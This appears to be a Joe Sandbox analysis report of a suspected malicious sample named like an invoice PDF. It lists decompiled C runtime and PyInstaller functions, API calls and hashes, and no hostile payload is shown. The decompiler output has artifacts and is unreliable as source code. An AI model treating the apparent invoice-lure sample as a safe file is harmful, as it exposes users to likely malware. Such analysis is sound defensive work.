                            • FormatMessageW, xrefs: 013148B1
                            • No error messages generated., xrefs: 013148AC
                            • PyInstaller: FormatMessageW failed., xrefs: 013148BE
                            Similarity
                            • API ID: ByteCharErrorFormatLastMessageMultiWide
                            • String ID: An attempt to set the process default activation context failed because the process default activation context was already set.$FormatMessageW$No error messages generated.$PyInstaller: FormatMessageW failed.$PyInstaller: pyi_win32_utils_to_utf8 failed.
                            • API String ID: 1653872744-3426200897
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 581 131cbfb-131cc33 GetFileType 582 131cc39-131cc44 581->582 583 131cd2e-131cd31 581->583 586 131cc66-131cc81 call 13238bb 582->586 587 131cc46-131cc57 call 131cf93 582->587 584 131cd33-131cd36 583->584 585 131cd5a-131cd82 583->585 584->585 588 131cd38-131cd3a 584->588 590 131cd84-131cd97 PeekNamedPipe 585->590 591 131cd9f-131cda1 585->591 593 131cd4b-131cd58 GetLastError call 131c998 586->593 600 131cc87-131ccb2 call 131cf2d call 131cdb3 586->600 603 131cd47-131cd49 587->603 604 131cc5d-131cc64 587->604 588->593 594 131cd3c-131cd41 call 131c9ce 588->594 590->591 596 131cd99-131cd9c 590->596 597 131cda2-131cdb2 call 131786a 591->597 593->603 594->603 596->591 600->603 612 131ccb8-131ccd5 call 131cdb3 600->612 603->597 604->586 612->603 615 131ccd7-131cce3 call 131cdb3 612->615 617 131cce8-131ccf6 615->617 617->603 618 131ccf8-131cd16 call 13238bb 617->618 618->593 621 131cd18-131cd2c call 131cefb 618->621 621->597
                            C-Code - Quality: 100%
                            			E0131CBFB(signed int __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr* _a16) {
                            				signed int _v8;
                            				intOrPtr _v16;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				void _v48;
                            				char _v64;
                            				void _v72;
                            				long _v76;
                            				intOrPtr _v80;
                            				char _v84;
                            				void* __ebx;
                            				signed int _t53;
                            				signed int _t56;
                            				intOrPtr _t66;
                            				signed int _t68;
                            				int _t70;
                            				signed int _t81;
                            				signed int _t83;
                            				signed int _t85;
                            				intOrPtr _t98;
                            				signed int _t104;
                            				signed int _t109;
                            				signed int _t111;
                            				signed int _t118;
                            				void* _t121;
                            				intOrPtr* _t128;
                            				signed int _t130;
                            				intOrPtr _t140;
                            
                            				_t118 = __edx;
                            				_t53 =  *0x133c008; // 0xa212446c
                            				_v8 = _t53 ^ _t130;
                            				_t128 = _a16;
                            				_t121 = _a12;
                            				_v80 = _a4;
                            				_v76 = _t121;
                            				_t56 = GetFileType(_t121); // executed
                            				_t104 = _t56 & 0xffff7fff;
                            				if(_t104 != 1) {
                            					__eflags = _t104 - 2;
                            					if(_t104 == 2) {
                            						L16:
                            						__eflags = _t104 - 2;
                            						 *((short*)(_t128 + 6)) = ((0 | _t104 != 0x00000002) - 0x00000001 & 0x00001000) + 0x1000;
                            						 *((short*)(_t128 + 8)) = 1;
                            						_t66 = _a8;
                            						 *((intOrPtr*)(_t128 + 0x10)) = _t66;
                            						 *_t128 = _t66;
                            						__eflags = _t104 - 2;
                            						if(_t104 != 2) {
                            							_t70 = PeekNamedPipe(_t121, 0, 0, 0,  &_v76, 0);
                            							__eflags = _t70;
                            							if(_t70 != 0) {
                            								 *((intOrPtr*)(_t128 + 0x14)) = _v76;
                            							}
                            						}
                            						_t68 = 1;
                            						__eflags = 1;
                            						L20:
                            						E0131786A();
                            						return _t68;
                            					}
                            					__eflags = _t104 - 3;
                            					if(_t104 == 3) {
                            						goto L16;
                            					}
                            					__eflags = _t104;
                            					if(_t104 != 0) {
                            						L15:
                            						E0131C998(GetLastError());
                            						L14:
                            						_t68 = 0;
                            						goto L20;
                            					}
                            					 *((intOrPtr*)(E0131C9CE())) = 9;
                            					goto L14;
                            				}
                            				 *((short*)(_t128 + 8)) = 1;
                            				_t74 = _v80;
                            				if(_v80 == 0) {
                            					L4:
                            					_t109 = 0xa;
                            					memset( &_v48, 0, _t109 << 2);
                            					if(E013238BB(0, _t140, _v76, 0,  &_v48, 0x28) == 0) {
                            						goto L15;
                            					}
                            					 *((short*)(_t128 + 6)) = E0131CF2D(0, _v16, _v80);
                            					_t81 = E0131CDB3(_v32, _v28, 0, 0); // executed
                            					 *(_t128 + 0x20) = _t81;
                            					 *(_t128 + 0x24) = _t118;
                            					if((_t81 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t24 = _t128 + 0x20; // 0x83cc758d
                            					_t83 = E0131CDB3(_v40, _v36,  *_t24, _t118); // executed
                            					 *(_t128 + 0x18) = _t83;
                            					 *(_t128 + 0x1c) = _t118;
                            					if((_t83 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t29 = _t128 + 0x24; // 0xcb830cc4
                            					_t30 = _t128 + 0x20; // 0x83cc758d
                            					_t85 = E0131CDB3(_v48, _v44,  *_t30,  *_t29); // executed
                            					 *(_t128 + 0x28) = _t85;
                            					 *(_t128 + 0x2c) = _t118;
                            					_t144 = (_t85 & _t118) - 0xffffffff;
                            					if((_t85 & _t118) == 0xffffffff) {
                            						goto L14;
                            					}
                            					_t111 = 6;
                            					memset( &_v72, 0, _t111 << 2);
                            					if(E013238BB(0, _t144, _v76, 1,  &_v72, 0x18) == 0) {
                            						goto L15;
                            					}
                            					_t39 = _t128 + 0x14; // 0x131cb3d
                            					_t68 = E0131CEFB( &_v64, _t39) & 0xffffff00 | _t95 != 0x00000000;
                            					goto L20;
                            				}
                            				_v84 = 0;
                            				if(E0131CF93(_t74,  &_v84) == 0) {
                            					goto L14;
                            				}
                            				_t98 = _v84 - 1;
                            				_t140 = _t98;
                            				 *((intOrPtr*)(_t128 + 0x10)) = _t98;
                            				 *_t128 = _t98;
                            				goto L4;
                            			}



































                            APIs
                            • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 0131CC20
                              • Part of subcall function 0131CF93: __dosmaperr.LIBCMT ref: 0131CFD6
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0131CB29), ref: 0131CD4B
                            • __dosmaperr.LIBCMT ref: 0131CD52
                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0131CD8F
                            Similarity
                            • API ID: __dosmaperr$ErrorFileLastNamedPeekPipeType
                            • String ID:
                            • API String ID: 3955570002-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 624 1311120-1311153 call 1319f16 call 1319b2b 629 13111f2-13111f7 624->629 630 1311159-131115c 624->630 630->629 631 1311162-1311189 call 1319f16 call 1319b2b call 1319f16 630->631 637 131118e-13111a8 call 1319b2b 631->637 637->629 640 13111aa-13111ad 637->640 641 13111b6-13111b9 640->641 642 13111af-13111b4 640->642 641->629 644 13111bb 641->644 643 13111c0-13111f1 call 1319f16 call 1319b2b 642->643 644->643
                            C-Code - Quality: 100%
                            			E01311120(void* __edx, void* _a4) {
                            				char _v4;
                            				signed int _t15;
                            				intOrPtr _t30;
                            				signed int _t32;
                            
                            				_t34 = __edx;
                            				_t35 = _a4;
                            				_v4 = 0;
                            				E01319F16(__edx,  *_a4, 0, 0); // executed
                            				E01319B2B( &_a4, 1, 2,  *_a4); // executed
                            				_t15 = _a4;
                            				if(_t15 != 0x4d || _t15 != 0x5a) {
                            					L8:
                            					return _t15 | 0xffffffff;
                            				} else {
                            					E01319F16(__edx,  *_t35, 0x3c, 0); // executed
                            					E01319B2B( &_v4, 4, 1,  *_t35);
                            					E01319F16(__edx,  *_t35, _v4 + 0x18, 0); // executed
                            					E01319B2B( &_a4, 2, 1,  *_t35);
                            					_t15 = _a4;
                            					if(_t15 != 0xb) {
                            						goto L8;
                            					} else {
                            						if(_t15 != 1) {
                            							if(_t15 != 2) {
                            								goto L8;
                            							} else {
                            								_t32 = 0xa8;
                            								goto L7;
                            							}
                            						} else {
                            							_t32 = 0x98;
                            							L7:
                            							E01319F16(_t34,  *_t35, _v4 + _t32, 0);
                            							E01319B2B( &_v4, 4, 1,  *_t35);
                            							_t30 = _v4;
                            							_t31 =  ==  ? _t32 | 0xffffffff : _t30;
                            							return  ==  ? _t32 | 0xffffffff : _t30;
                            						}
                            					}
                            				}
                            			}








                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction ID: 927cdc730b5f5fe74c634d5fdd7f43d72af10de816f2be815dc7d3c837cf70cc
                            • Opcode Fuzzy Hash: ce98422da571ea914d066f3442d10b5b37358b873f4f021f930ab9fa887209a3
                            • Instruction Fuzzy Hash: 49210571644302BAEE346F2CCC42F96B399EF4471CF50492DF3D0AA1DAD6B2D8458B46
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0131CDB3(struct _FILETIME _a4, intOrPtr _a8, signed int _a12, void* _a16) {
                            				signed int _v8;
                            				struct _SYSTEMTIME _v24;
                            				struct _SYSTEMTIME _v40;
                            				signed int _v44;
                            				signed int _t20;
                            				signed int _t26;
                            				signed int _t27;
                            				int _t30;
                            				signed int _t43;
                            				signed int _t46;
                            
                            				_t20 =  *0x133c008; // 0xa212446c
                            				_v8 = _t20 ^ _t46;
                            				if(_a4.dwLowDateTime != 0 || _a8 != 0) {
                            					if(FileTimeToSystemTime( &_a4,  &_v40) == 0) {
                            						L7:
                            						_t26 = E0131C998(GetLastError());
                            						goto L8;
                            					} else {
                            						_t30 = SystemTimeToTzSpecificLocalTime(0,  &_v40,  &_v24); // executed
                            						if(_t30 == 0) {
                            							goto L7;
                            						} else {
                            							_v44 = _v44 | 0xffffffff;
                            							_t27 = E0131CE5D( &_v24,  &(_v24.wMonth),  &(_v24.wDay),  &(_v24.wHour),  &(_v24.wMinute),  &(_v24.wSecond),  &_v44); // executed
                            							if((_t27 & _t43) == 0xffffffff) {
                            								_t26 = E0131C9CE();
                            								 *_t26 = 0x84;
                            								L8:
                            								_t27 = _t26 | 0xffffffff;
                            							}
                            						}
                            					}
                            				} else {
                            					_t27 = _a12;
                            				}
                            				E0131786A();
                            				return _t27;
                            			}














                            APIs
                            • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,00000000,00000000,000000FF,?,?,00000000), ref: 0131CDE1
                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0131CDF5
                            • GetLastError.KERNEL32 ref: 0131CE3D
                            • __dosmaperr.LIBCMT ref: 0131CE44
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Time$System$ErrorFileLastLocalSpecific__dosmaperr
                            • String ID:
                            • API String ID: 593088924-0
                            • Opcode ID: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction ID: e724454b2b17529ab85fe9cd1449cf305dec49364d4b75a11f38b9fb4f15c06e
                            • Opcode Fuzzy Hash: 511e000e6fbd5f157d91cd7f22f46a7e415887e7b6224e67bb69092562aa3f6b
                            • Instruction Fuzzy Hash: DE21607294010DABCB18DFE4C944AEEBBBCAF08325F106256E516D6084EB34D744CB65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E0131FD60(signed int __eax, void* __ecx, void* __edx) {
                            				signed int _t2;
                            				signed int _t3;
                            				char* _t4;
                            				int _t10;
                            				int _t11;
                            				void* _t13;
                            				void* _t16;
                            				short** _t17;
                            				char* _t20;
                            				void* _t21;
                            
                            				_t16 = __edx;
                            				_t13 = __ecx;
                            				_t17 =  *0x13460c0; // 0xe44410
                            				if(_t17 != 0) {
                            					_t10 = 0;
                            					while( *_t17 != _t10) {
                            						_t2 = WideCharToMultiByte(_t10, _t10,  *_t17, 0xffffffff, _t10, _t10, _t10, _t10);
                            						_t11 = _t2;
                            						if(_t11 == 0) {
                            							L11:
                            							_t3 = _t2 | 0xffffffff;
                            						} else {
                            							_t4 = E01320B10(_t13, _t11, 1); // executed
                            							_t20 = _t4;
                            							_pop(_t13);
                            							if(_t20 == 0) {
                            								L10:
                            								_t2 = E013209EB(_t20);
                            								goto L11;
                            							} else {
                            								_t10 = 0;
                            								if(WideCharToMultiByte(0, 0,  *_t17, 0xffffffff, _t20, _t11, 0, 0) == 0) {
                            									goto L10;
                            								} else {
                            									_push(0);
                            									_push(_t20);
                            									E01326882(_t16);
                            									E013209EB(0);
                            									_t21 = _t21 + 0xc;
                            									_t17 =  &(_t17[1]);
                            									continue;
                            								}
                            							}
                            						}
                            						L9:
                            						return _t3;
                            						goto L12;
                            					}
                            					_t3 = 0;
                            					goto L9;
                            				} else {
                            					return __eax | 0xffffffff;
                            				}
                            				L12:
                            			}














                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9274f6e52212be0b80aa434d9d61f21edb0d65ca14ef6ba97f41bbc0bd1d8b8f
                            • Instruction ID: 687964b47140dbb8d0ad98b8a684c8998c20f3c25440ae0a7b990c3e9fbdf379
                            • Opcode Fuzzy Hash: 9274f6e52212be0b80aa434d9d61f21edb0d65ca14ef6ba97f41bbc0bd1d8b8f
                            • Instruction Fuzzy Hash: A8014FB220962A7EF629297C6CC1F7B665DDF517BCF600326F632551DDDA608D0841A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 92%
                            			E0131FAB9(void* __ebx, void* __ecx) {
                            				intOrPtr _t3;
                            				signed int _t15;
                            				signed int _t16;
                            
                            				if( *0x13460bc == 0) {
                            					_push(_t15);
                            					E01327978(__ecx);
                            					_t19 = E01327C60();
                            					if(_t2 != 0) {
                            						_t3 = E0131FB66(__ebx, _t19); // executed
                            						if(_t3 != 0) {
                            							 *0x13460c8 = _t3;
                            							E0131FECE(0x13460bc, _t3);
                            							_t16 = 0;
                            						} else {
                            							_t16 = _t15 | 0xffffffff;
                            						}
                            						E013209EB(0);
                            					} else {
                            						_t16 = _t15 | 0xffffffff;
                            					}
                            					E013209EB(_t19);
                            					return _t16;
                            				} else {
                            					return 0;
                            				}
                            			}







                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID: Y
                            • API String ID: 269201875-3319100138
                            • Opcode ID: 48e1b3ff3ef00719039f149d60c6fd6cc5a1a54b157ffb0d0bcf98a6b7ab8b21
                            • Instruction ID: 4862498e8f1ecc76b1e7fd4ef5752a9bcd8a924b25e486fdefe13f0ea981205e
                            • Opcode Fuzzy Hash: 48e1b3ff3ef00719039f149d60c6fd6cc5a1a54b157ffb0d0bcf98a6b7ab8b21
                            • Instruction Fuzzy Hash: 8CE0E5B3A0952252F67D363E6C01B6F159EABD2B3DF10021AF124C62C8CE24484E85A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 80%
                            			E0131FB66(void* __ebx, char* _a4) {
                            				signed short* _v0;
                            				intOrPtr* _v8;
                            				intOrPtr* _v12;
                            				signed int _v16;
                            				signed short* _v40;
                            				intOrPtr _v56;
                            				intOrPtr* _v84;
                            				void* __ecx;
                            				char _t32;
                            				intOrPtr _t33;
                            				intOrPtr _t38;
                            				intOrPtr* _t39;
                            				intOrPtr _t40;
                            				void* _t42;
                            				signed int _t46;
                            				signed short _t51;
                            				signed int _t52;
                            				void* _t55;
                            				void* _t57;
                            				intOrPtr _t58;
                            				intOrPtr* _t60;
                            				signed short _t63;
                            				intOrPtr* _t64;
                            				void* _t68;
                            				intOrPtr* _t69;
                            				signed short* _t71;
                            				void* _t73;
                            				intOrPtr* _t75;
                            				intOrPtr* _t79;
                            				signed short* _t88;
                            				signed int _t90;
                            				void* _t91;
                            				signed short* _t99;
                            				intOrPtr _t102;
                            				void* _t103;
                            				intOrPtr _t104;
                            				signed short* _t105;
                            				char* _t107;
                            				intOrPtr _t109;
                            				intOrPtr* _t111;
                            				signed short* _t113;
                            				intOrPtr* _t115;
                            				intOrPtr _t118;
                            				signed short* _t119;
                            				intOrPtr _t120;
                            				intOrPtr _t122;
                            				intOrPtr* _t123;
                            				void* _t127;
                            				void* _t129;
                            
                            				_push(_t74);
                            				_push(_t74);
                            				_t107 = _a4;
                            				_t102 = 0;
                            				_t115 = _t107;
                            				_t32 =  *_t107;
                            				while(_t32 != 0) {
                            					if(_t32 != 0x3d) {
                            						_t102 = _t102 + 1;
                            					}
                            					_t75 = _t115;
                            					_t68 = _t75 + 1;
                            					do {
                            						_t33 =  *_t75;
                            						_t75 = _t75 + 1;
                            					} while (_t33 != 0);
                            					_t74 = _t75 - _t68;
                            					_t115 = _t115 + 1 + _t75 - _t68;
                            					_t32 =  *_t115;
                            				}
                            				_t3 = _t102 + 1; // 0x1
                            				_t69 = E01320B10(_t74, _t3, 4);
                            				if(_t69 == 0) {
                            					L19:
                            					_t69 = 0;
                            					goto L20;
                            				} else {
                            					_v8 = _t69;
                            					while( *_t107 != 0) {
                            						_t79 = _t107;
                            						_t103 = _t79 + 1;
                            						do {
                            							_t38 =  *_t79;
                            							_t79 = _t79 + 1;
                            						} while (_t38 != 0);
                            						_t80 = _t79 - _t103;
                            						_t39 = _t79 - _t103 + 1;
                            						_v12 = _t39;
                            						if( *_t107 == 0x3d) {
                            							L15:
                            							_t107 = _t107 + _t39;
                            							continue;
                            						} else {
                            							_t40 = E01320B10(_t80, _t39, 1); // executed
                            							_t118 = _t40;
                            							_pop(_t82);
                            							if(_t118 == 0) {
                            								_push(_t69);
                            								L45();
                            								E013209EB(0);
                            								goto L19;
                            							} else {
                            								_t42 = E01320A73(_t118, _v12, _t107);
                            								_t129 = _t129 + 0xc;
                            								if(_t42 != 0) {
                            									_push(0);
                            									_push(0);
                            									_push(0);
                            									_push(0);
                            									_push(0);
                            									E01321798();
                            									asm("int3");
                            									_t127 = _t129;
                            									_push(_t82);
                            									_push(_t82);
                            									_push(_t69);
                            									_t71 = _v40;
                            									_v56 = 0;
                            									_t104 = 0;
                            									_push(_t118);
                            									_push(_t107);
                            									_t46 =  *_t71 & 0x0000ffff;
                            									_t119 = _t71;
                            									if(_t46 != 0) {
                            										_t73 = 0x3d;
                            										do {
                            											if(_t46 != _t73) {
                            												_t104 = _t104 + 1;
                            											}
                            											_t99 = _t119;
                            											_t14 =  &(_t99[1]); // 0x2
                            											_t113 = _t14;
                            											do {
                            												_t63 =  *_t99;
                            												_t99 =  &(_t99[1]);
                            											} while (_t63 != _v16);
                            											_t82 = _t99 - _t113 >> 1;
                            											_t119 =  &(( &(_t119[_t99 - _t113 >> 1]))[1]);
                            											_t46 =  *_t119 & 0x0000ffff;
                            										} while (_t46 != 0);
                            										_t71 = _v0;
                            									}
                            									_t19 = _t104 + 1; // 0x1
                            									_t109 = E01320B10(_t82, _t19, 4);
                            									_t120 = 0;
                            									if(_t109 == 0) {
                            										L42:
                            										_t109 = _t120;
                            										goto L43;
                            									} else {
                            										_v12 = _t109;
                            										while( *_t71 != _t120) {
                            											_t88 = _t71;
                            											_t21 =  &(_t88[1]); // 0x2
                            											_t105 = _t21;
                            											do {
                            												_t51 =  *_t88;
                            												_t88 =  &(_t88[1]);
                            											} while (_t51 != _t120);
                            											_t90 = _t88 - _t105 >> 1;
                            											_t22 = _t90 + 1; // -1
                            											_t52 = _t22;
                            											_t91 = 0x3d;
                            											_v16 = _t52;
                            											if( *_t71 == _t91) {
                            												L38:
                            												_t71 =  &(_t71[_t52]);
                            												continue;
                            											} else {
                            												_t122 = E01320B10(_t91, _t52, 2);
                            												if(_t122 == 0) {
                            													_push(_t109);
                            													L45();
                            													_t120 = 0;
                            													E013209EB(0);
                            													goto L42;
                            												} else {
                            													_t55 = E0132618C(_t122, _v16, _t71);
                            													_t129 = _t129 + 0xc;
                            													if(_t55 != 0) {
                            														_push(0);
                            														_push(0);
                            														_push(0);
                            														_push(0);
                            														_push(0);
                            														_t57 = E01321798();
                            														asm("int3");
                            														_push(_t127);
                            														_push(_t122);
                            														_t123 = _v84;
                            														if(_t123 != 0) {
                            															_t58 =  *_t123;
                            															_push(_t109);
                            															_t111 = _t123;
                            															while(_t58 != 0) {
                            																E013209EB(_t58);
                            																_t111 = _t111 + 4;
                            																_t58 =  *_t111;
                            															}
                            															_t57 = E013209EB(_t123);
                            														}
                            														return _t57;
                            													} else {
                            														_t60 = _v12;
                            														 *_t60 = _t122;
                            														_t120 = 0;
                            														_v12 = _t60 + 4;
                            														E013209EB(0);
                            														_t52 = _v16;
                            														goto L38;
                            													}
                            												}
                            											}
                            											goto L51;
                            										}
                            										L43:
                            										E013209EB(_t120);
                            										return _t109;
                            									}
                            								} else {
                            									_t64 = _v8;
                            									 *_t64 = _t118;
                            									_v8 = _t64 + 4;
                            									E013209EB(0);
                            									_t39 = _v12;
                            									goto L15;
                            								}
                            							}
                            						}
                            						goto L51;
                            					}
                            					L20:
                            					E013209EB(0);
                            					return _t69;
                            				}
                            				L51:
                            			}

                            APIs
                            Memory Dump Source
                            • Source File: 00000003.00000002.562255860.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000003.00000002.562244608.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562321969.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.562355557.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562368828.000000000133E000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562386098.0000000001344000.00000004.00020000.sdmp
                            • Associated: 00000003.00000002.562405939.0000000001347000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: _free
                            • String ID:
                            • API String ID: 269201875-0
                            • Opcode ID: 72ff7c364c1fa7efa34b02dcdfad83067f22caec69e9aeeb4cf395e5ff3d9ce6
                            • Instruction ID: d806dcccb88e436ddc96443788fc935bc7e1fad7a1661a56e91cffe9e779ba25
                            • Opcode Fuzzy Hash: 72ff7c364c1fa7efa34b02dcdfad83067f22caec69e9aeeb4cf395e5ff3d9ce6
                            • Instruction Fuzzy Hash: CF2190726082166FFF1CAE7C9850BBABBACDF4532CF14419AE94597145EA728C0E8290
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E0132B2EE(void* __edx, void* __eflags) {
                            				signed int _v8;
                            				char _v264;
                            				char _v268;
                            				char _v272;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t10;
                            				void* _t14;
                            				void* _t17;
                            				signed int _t21;
                            				void* _t27;
                            				signed int _t36;
                            				void* _t38;
                            				signed int _t42;
                            				signed int _t44;
                            				signed int _t45;
                            
                            				_t10 =  *0x133c008; // 0xa212446c
                            				_v8 = _t10 ^ _t45;
                            				 *0x133c91c =  *0x133c91c | 0xffffffff;
                            				 *0x133c910 =  *0x133c910 | 0xffffffff;
                            				_push(_t38);
                            				_t25 = "TZ";
                            				_t36 = 0;
                            				 *0x1346578 = 0;
                            				_t14 = E01326CC0("TZ", __edx, 0, _t38, __eflags,  &_v268,  &_v264, 0x100, "TZ"); // executed
                            				if(_t14 != 0) {
                            					__eflags = _t14 - 0x22;
                            					if(__eflags == 0) {
                            						_t44 = E01320A25(_t27, _v268);
                            						__eflags = _t44;
                            						if(__eflags != 0) {
                            							_t21 = E01326CC0(_t25, __edx, 0, _t44, __eflags,  &_v272, _t44, _v268, _t25);
                            							__eflags = _t21;
                            							if(_t21 == 0) {
                            								E013209EB(0);
                            								_t36 = _t44;
                            							} else {
                            								_push(_t44);
                            								goto L5;
                            							}
                            						} else {
                            							_push(0);
                            							L5:
                            							E013209EB();
                            						}
                            					}
                            				} else {
                            					_t36 =  &_v264;
                            				}
                            				asm("sbb esi, esi");
                            				_t42 =  ~(_t36 -  &_v264) & _t36;
                            				if(_t36 == 0) {
                            					L13:
                            					E0132B193(__eflags); // executed
                            				} else {
                            					_t52 =  *_t36;
                            					if( *_t36 == 0) {
                            						goto L13;
                            					} else {
                            						_push(_t36);
                            						E0132AFBE(_t52);
                            					}
                            				}
                            				_t17 = E013209EB(_t42);
                            				E0131786A();
                            				return _t17;
                            			}

                            APIs
                            • _free.LIBCMT ref: 0132B361
                            • _free.LIBCMT ref: 0132B3B7
                              • Part of subcall function 0132B193: _free.LIBCMT ref: 0132B1EB
                              • Part of subcall function 0132B193: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,01339410), ref: 0132B1FD
                              • Part of subcall function 0132B193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Standard Time,000000FF,00000000,0000003F,00000000,?,?), ref: 0132B275
                              • Part of subcall function 0132B193: WideCharToMultiByte.KERNEL32(00000000,00000000,Pacific Daylight Time,000000FF,?,0000003F,00000000,?), ref: 0132B2A2
                            Similarity
                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                            • String ID:
                            • API String ID: 314583886-0
                            • Opcode ID: a6c87e5752ac59b2601ed8750f91b9f38d6659ca7991270cbb850c9cf4a0d427
                            • Instruction ID: 3fb1dff9025f87a56e7a421d8e40114891833e7c12c29ce40a85e95ff70c8e7a
                            • Opcode Fuzzy Hash: a6c87e5752ac59b2601ed8750f91b9f38d6659ca7991270cbb850c9cf4a0d427
                            • Instruction Fuzzy Hash: 39213B72D0013997DB31B6299C81EEAF77CDB5176CF100396EE55A3188EF704E85CA91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E013218F4(void* __eflags, signed int _a4) {
                            				intOrPtr _t13;
                            				int _t15;
                            				void* _t21;
                            				signed int _t33;
                            				long _t35;
                            
                            				_t33 = _a4;
                            				if(E0131E926(_t33) != 0xffffffff) {
                            					_t13 =  *0x1346108; // 0xe4e818
                            					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                            						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                            							goto L7;
                            						} else {
                            							goto L6;
                            						}
                            					} else {
                            						L6:
                            						_t21 = E0131E926(2);
                            						if(E0131E926(1) == _t21) {
                            							goto L1;
                            						}
                            						L7:
                            						_t15 = FindCloseChangeNotification(E0131E926(_t33)); // executed
                            						if(_t15 != 0) {
                            							goto L1;
                            						}
                            						_t35 = GetLastError();
                            						L9:
                            						E0131E895(_t33);
                            						 *((char*)( *((intOrPtr*)(0x1346108 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                            						if(_t35 == 0) {
                            							return 0;
                            						}
                            						return E0131C998(_t35) | 0xffffffff;
                            					}
                            				}
                            				L1:
                            				_t35 = 0;
                            				goto L9;
                            			}

                            APIs
                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,01321812,?), ref: 0132194A
